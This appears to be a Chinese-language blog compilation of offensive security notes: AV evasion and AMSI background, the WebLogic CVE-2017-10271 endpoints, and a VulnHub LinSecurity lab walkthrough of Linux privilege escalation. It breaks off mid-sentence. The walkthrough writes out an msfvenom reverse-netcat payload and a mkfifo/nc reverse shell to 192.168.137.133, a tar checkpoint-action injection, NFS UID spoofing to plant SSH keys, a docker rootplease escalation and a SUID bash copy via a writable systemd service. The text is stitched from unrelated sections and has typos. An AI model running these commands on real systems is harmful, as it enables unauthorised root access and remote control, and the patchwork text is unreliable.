Powershell与Amsi

powershell

作为Windows系统内置工具， Powershell脚本的功能十分强大，同时作为系统的功能组件不会被常规杀毒引擎查杀。兼具这两个有点，Powershell的恶意利用程序得到快速发展，从2012年Powershell 攻击利用工具成型化以来，互联网中的通过无文件与Powershell的攻击事件数量逐年递增。无文件攻击在感染计算机时，不需写入磁盘即可从事恶意活动，绕过那些基于签名和文件检测的传统安全软件。 如何检测这些恶意行为成了安全厂商和企业用户与个人更为关心的问题。微软在2015年中旬开始提出了针对无文件攻击和Powershell脚本攻击的检测缓解方案-AMSI。

背景

在免杀的过程中，分离免杀因为其加载器和shellcode分离的原因让特征不明显，分离免杀成为了现在的主流免杀方式了。

syscall

syscall基础概念

Windows下有两种处理器访问模式：用户模式(User mode)和内核模式(Kernel mode)。

用户模式下运行应用程序时，Windows会为该程序创建一个新进程，提供一个私有虚拟地址空间和一个私有句柄表，因为私有，一个应用程序无法修改另一个应用程序的私有虚拟地址空间的数据。

内核模式下，所有运行的代码都共享一个虚拟地址空间，因此内核中驱动程序可能还会因为写入错误的地址空间导致其他驱动程序甚至系统出现错误。

内核中包含了大部分操作系统的内部数据结构，所以用户模式下的应用程序在访问这些数据结构或调用内部windows例程以执行特权操作的时候，必须先从用户模式切换到内核模式，这里就涉及到了系统调用。

x86 windows使用SYSENTER实现系统调用

x64 windows使用syscall实现系统调用

什么是PE结构

PE结构是Windows操作系统下标准的可执行文件的头格式

当你用二进制的编辑器(如010editor)打开一个exe文件，就会发现这里面有PE结构，其中包括但不限于DOS头，NT头,可选NT头，节头。

杀毒软件对文件危险的判定等级

从文件落地到磁盘上开始，杀毒软件就已经对落地文件进行了扫描与检测，这里我们需要知道杀毒软件对文件危险系数的判定等级。

1.无害

无害等级，没有任何问题。杀毒软件从此不会管你。

2.可疑

如果确定文件为可疑等级，那么杀毒软件会持续监控软件的行为特征。

3.确认病毒

如果确定文件为病毒，那么杀毒软件就会直接把文件刀掉。

前言

最近为了学习免杀，需要先从C++开始打基础。对于我这个从来没学过C语言的菜鸡，真的是异常的艰险和挑战。这里往下对遇到的坑做下记录。

准备

用C++的主要目的就是为了会调用windowsapi函数，但是windowsapi函数不仅复杂，而且我在网上也没看到什么好的教学。基本上就相当于只有个人看文章了，这里我特地用了以下几个帮助我学习:

1.windowsAPI数据类型

2.MSDN

3.对应的需要调用的函数的前人示例。

恶意代码与反病毒的基本概念

恶意代码的基本概念及危害

只要是运行用户预期之外的目的的代码都算恶意代码

以目的划分类型

1. 木马(控制、信息获取)
2. 病毒(破坏)
3. 其他(捆绑、广告等其他经济利益)

蠕虫

蠕虫其实并不算某一种恶意代码，它算是一种手段，只要能够用来传播的手段，都可以称为蠕虫。

Weblogic

CVE-2017-10271

漏洞概述

Weblogic的WLS-Security 组件对外提供webservice服务，其中使用了XMLDecoder来解析用户传入的XML数据，在解析的过程中出现反序列化漏洞，导致可以执行任意命令。

涉及版本：

1

10.3.6.0，12.1.3.0.0，12.2.1.1.0

漏洞地址

1
2
3
4
5
6
7
8
9
10

/wsl-wsat/....   //只要是wsl-wsat下的url都会有此漏洞。
比如:
/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

靶机地址与安装

1
2
3
4
5
6
7
8
9
10
11
12
13
14

#下载链接
https://www.vulnhub.com/entry/linsecurity-1,244/
用户名密码：bob/secret
#安装与配置
1.修改默认键盘布局[默认不是美式键盘]
sudo awk 'BEGIN {system("/bin/sh")}'
[修改前\"符号是shift+2]
vim /etc/default/keyboard
[讲XKBLAYOUT改的值为us]
setupcon
2.配置网卡[Ubuntu 18通过netplan设置网络]
vim /etc/netplan/50-cloud-init.yaml
[将enp0s3改为ens33]
netplan apply

网卡配置的时候记得把ens33往前面移动一点点

Sudo提权

Sudo权限本意是root把本来只能超级用户执行的命令赋予普通用户执行。

Sudo提权其实是因为管理员平时为了方便，给/etc/sudoers文件配hi不当，从而导致了权限提升的问题。

当你自己是一个普通用户的时候，可以通过命令sudo-l来查看自己可以执行哪些sudo命令

可以发现这里，我们有多种命令都被赋予了sudo权限。

ash | GTFOBins这个网站可以让我们查阅通过sudo权限如何调用命令获得root权限。比如我们查阅ash

在靶机中键入

1

sudo ash

即可成功提权

etc/passwd哈希

liunx的用户密码哈希存储在/etc/shadow文件，普通用户能够看到的是/etc/passwd这个文件。在/etc/passwd中，我们会发现如下形式。

比如root:x:0:0:root:/root:/bin/bash

1
2
3
4
5
6
7

1.用户名
2.密码，x表示密码保存在/etc/shadow
3.UID，0代表root
4.GID，表示所在组
5.描述信息，依次为Full Name、Room Number、Work Phone、Home Phone和Other
6.用户主目录
7.默认shell类型

账户的第二列是密码hash，如果该列为x则代表密码哈希存储在/etc/shadow文件上。

这里我们发现账户insecurity是超级账户（uid，gid为0）并且密码存储在了passwd文件上，借此可以拷贝下来解密

切换用户即可提权成功。

etc/shadow哈希

而/etc/shadow默认只能是root用户权限才能查看。它保存的是加密后的密码和用户的相关密码信息，每一行代表一个用户，每一行通过冒号:分为9个部分

为什么我们这里能以bob权限看到shadow呢，因为在刚才的sudo提取中，我们看到man命令也是赋予了sudo权限的，所以可以借此看到shadow文件。

1
2
3
4
5
6
7
8
9
10
11
12
13
14

1.用户名
2.加密后的密码
3.上次修改密码的时间(从1970.1.1开始的总天数)
4.两次修改密码间隔的最少天数，如果为0，则没有限制
5.两次修改密码间隔最多的天数,表示该用户的密码会在多少天后过期，如果为99999则没有限制
6.提前多少天警告用户密码将过期
7.在密码过期之后多少天禁用此用户
8.用户过期日期(从1970.1.1开始的总天数)，如果为0，则该用户永久可用
9.保留
#由示例可知，加密的密码具有固定格式：
$id$salt$encrypted
id表示加密算法，1代表MD5，5代表SHA-256，6代表SHA-512
salt为盐值,系统随机生成
encrypted表示密码的hash值

由此也可以通过解密hash值，来得到密码。

crontab定时任务

corntab文件格式

1
2
3
4
5
6
7
8

* * * * * command
分 时 日 月 周 命令
第1列表示分钟1～59 每分钟用*或者 */1表示
第2列表示小时1～23（0表示0点）
第3列表示日期1～31
第4列表示月份1～12
第5列标识号星期0～6（0表示星期天）
第6列要运行的命令

查看corn.daily权限

发现这个定时任务的执行权限是root。接下来查看其内容

知道它是把用户/home目录下的文件使用tar打包备份到/etc/backups下。

这里涉及到了利用通配符使用tar进行命令注入。

先在我们自己的kali机器上生成一个nc的payload

1

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.137.133 lport=4444

在受害机器上的bob目录下，注入一个标志来指定我们的检查点.

--checkpoint是指每写入n个记录之后设置一个检查点，在检查点可以执行任意的操作。

1

–checkpoint-action=ACTION 在每个checkpoint（检查点）上执行ACTION

将payload写入一个sh文件。

1

echo "mkfifo /tmp/vtqm; nc 192.168.137.133 4444 0</tmp/vtqm | /bin/sh >/tmp/vtqm 2>&1; rm /tmp/vtqm" > shell.sh

注入一个指定检查点动作的标志

1

echo "" > "--checkpoint-action=exec=sh shell.sh"

–checkpoint-action=ACTION 在每个checkpoint（检查点）上执行ACTION

为什么这个提权能成功呢？因为我们相当于用到了tar命令的--checkpoint与--checkpoint-action参数，让他在打包文件时执行了我们的命令。就反弹了shell。

敏感隐藏文件

有时候隐藏文件可能会存放一些重要信息，比如我们搜索home目录下的所有隐藏文件，并用ls -al来显示

1

find / -name ".*" -type f -path "/home/*" -exec ls -al {} \; 2>/dev/null

该命令是查找所有隐藏文件。并将无法访问的文件错误信息导入到/dev/null中。这样就会很清楚的只看到可以回显可以查看的文件。

发现susan目录下的秘密文件.secret。查看可以知道密码

Suid提权

Suid这个是uid+s的组合，s指的是特殊权限。一般情况下，用户的权限是3位，比如0755这样的，特殊权限默认没有配置，但是如果超级管理员希望用户在执行一些特殊权限文件时，拥有root权限，就会配置特殊权限

比如说passwd这个命令，这个命令会修改/etc/shadow文件，而/etc/shadow只有root才能修改，本来passwd这个命令应该也只能root才能执行。但是系统为了让普通用户能够修改自己的密码，对passwd这个命令赋予了特殊权限并添加了只能修改自己密码的限制。

使用find命令快速查找所有suid文件

1

find / -perm 4000 -type f -exec ls -al {} 2>/dev/null \;

xxd提权

发现

1

-rwsr-x--- 1 root itservices 18552 Apr 10 2018 /usr/bin/xxd

而组itservices具有执行权限，通过/etc/group发现susan用户属于Itservices用户组。

接下来可以通过刚才发现的敏感文件，切换到susan用户。

仍然可以使用上篇发现的网站用来查询在xxd有suid的情况下可以提权的命令。

这里的LFILE是在命令行中定义的变量，它被用于定义需要查看的文件。这里我们以/etc/shadow作为示例。

taskset

除了xxd之外，在之前还有文件叫taskset也能用来提权。

第三方服务访问

NFS提权

什么是NFS？

网络文件系统(NFS)是一个客户端/服务器应用程序，它使计算机用户可以查看和选择存储和更新远程计算机上的文件，就像它们位于用户自己的计算机上一样。在NFS协议是几个分布式文件系统标准，网络附加存储(NAS)之一。

我们用kali可以搜索到被害机器上开放着nfs服务。

使用命令

1

showmount -e 192.168.137.144

可以查看远程nfs服务器上的共享目录。

在kali机器上挂在远程目录

一般来说，可以把挂载出来的目录立即尝试添加authorized_key文件，从而实现ssh免密码登录，但是这里创造文件是不允许的，因为提示权限不够。即使我们在kali机器上是root权限，但是我们还是没有写入权限，这是因为默认情况下客户端的root身份会被分配成用户nfsnobody。

解决方法是在kali上创建同靶机系统相同UID且相同用户名的账户，用其来写入文件。(即伪造文件所有者的UID和GID来欺骗nfs服务器。)

在被害机器中我们可以知道peter账户的uid为1001，gid为1005.

在kali机器中创建相同账户。

1
2

groupadd -g 1005 peter
adduser peter -uid 1001 -gid 1005

切换到peter账户，可以在该目录下写文件了。

写入ssh公钥

1
2
3
4
5
6
7
8
9
10

#[攻击机]ssh-keygen生成公私钥对
ssg-keygen
#创建.ssh目录
peter@kali:/mnt/peter$ mkdir .ssh
#传输public key
peter@kali:/mnt/peter$ cat ~/.ssh/id_rsa.pub > /mnt/peter/.ssh/authorized_keys
#设置权限
peter@kali:/mnt/peter/.ssh$ chmod 700 ../.ssh/
peter@kali:/mnt/peter/.ssh$ chmod 600 authorized_keys
#使用私钥登录

docker组提权

peter用户属于docker组，docker组的成员，可以根据此漏洞来获取root的shell

https://fosterelli.co/privilege-escalation-via-docker.html

1

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

systemd配置提权

systemd

历史上，Linux的启动一直采用init进程。

下面的命令用来启动服务

1
2

service apache2 start
sudo /etc/init.d/apache2 start

这种方法有两个缺点。

1.启动时间长。init进程是串行启动，只有前一个进程启动完，才会启动下一个进程。

2.启动脚本复杂。init进程只是执行启动脚本，不管其他事情。脚本需要自己处理各种情况，这往往使脚本变得很长。

systemd就是为了解决这些问题而诞生的。它的设计目标是，为系统的启动和管理提供一套完整的解决方案。使用了Systemd，就不需要再用init了。Systemd取代了init，成为了系统的第一个进行（pid等于1），其他进程都是它的子进程。Systemd并不是一个命令，而是一组命令，涉及到系统管理的方方面面。

systemctl是systemd的主命令，用于管理系统。

1
2
3
4
5
6
7
8
9
10
11
12
13

# 重启系统
$ sudo systemctl reboot
# 关闭系统，切断电源
$ sudo systemctl poweroff systemd-analyze命令用于查看启动耗时。
# 查看启动耗时
$ systemd-analyze
# 查看每个服务的启动耗时
$ systemd-analyze blame
# hostnamectl命令用于查看当前主机的信息。
# 显示当前主机的信息
$ hostnamectl
# 设置主机名
$ sudo hostnamectl set-hostname rhel7

systemd提权

查看peter用户的systemd配置，发现peter这个用户拥有debug.service文件，并且他对这个文件具有读和写的权限。

如果服务器存在缺陷，可以被覆盖或者修改文件，可以通过修改低权限用户有权访问的.service文件并更改run()命令来将其转换为代码执行。重新启动服务时，将运行攻击者的命令。

查看debug.service文件，这里我们可以修改Execstart行，除此之外还可以修改ExecStop和ExecReload来自启动和重启服务时执行命令

/root/debug这是一个二进制服务并且该服务以root身份运行。

使用一个类似ssh可以sudo执行的方法。让root身份来创建一个systemdexpl.sh脚本，将/bin/bash文件复制到systemdbash并设置一个SUID位并且赋予执行权限。

1
2

echo -e '#!/bin/bash \ncp /bin/bash /home/peter/systemdbash \nchmod 6755
/home/peter/systemdbash' > /home/peter/systemdexpl.sh && chmod +x systemdexpl.sh

该命令的意思是将bash复制到/home/peter/systemdbash下，并赋予权限，便于到时候我们可以直接执行SUID提权。

之后更改debug.service下的Execstart行为/home/peter/systemdexpl.sh

接下来就可以利用suid提权

shellcode基础

什么是shellcode

shellcode是一段由16进制组成的机器码，因为经常可以让攻击者受到被害机器的shell而得名(但现在shellcode功能更多样，比如添加用户或者执行特殊命令，特殊进程等但是都被统称为shellcode)，其特点是在于它可以无文件落地，直接在内存中运行，以至于一般杀毒软件无法查杀到。一般来说，shellcode会在目标机器上建立一个新的shell进程，然后同攻击者进行通信，接受攻击者的指令，然后返回结果。那么如何建立一个shell进程呢？在Unix中使用execve命令可以建立，而在windows下需要调用内核API来建立。

shellcode的方向

shellcode一般分为正向和反向。在msf中，我们经常会发现一个payload有reverse的前缀（表示为反向）它们的原理如下: